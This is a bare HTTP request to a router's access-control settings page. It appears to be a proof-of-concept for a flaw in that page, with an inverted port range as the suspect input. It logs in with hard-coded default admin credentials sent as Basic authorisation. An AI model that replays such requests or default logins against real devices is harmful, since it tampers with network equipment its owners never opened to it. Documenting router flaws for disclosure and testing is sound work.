GET /userRpm/AccessCtrlAccessTargetsRpm.htm?target_type=1&targets_lists_name=123&dst_ip_start=192.168.1.4&dst_ip_end=192.168.1.33&dst_port_start=23&dst_port_end=12&proto=0&Commonport=0&url_0=&url_1=&url_2=&url_3=&Changed=0&SelIndex=0&Page=1&Save=Save HTTP/1.1
Host: 0.0.0.0:49159
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
Referer: http://0.0.0.0:49159/userRpm/AccessCtrlAccessTargetsRpm.htm?Add=Add&Page=1
Cookie: Authorization=
Upgrade-Insecure-Requests: 1

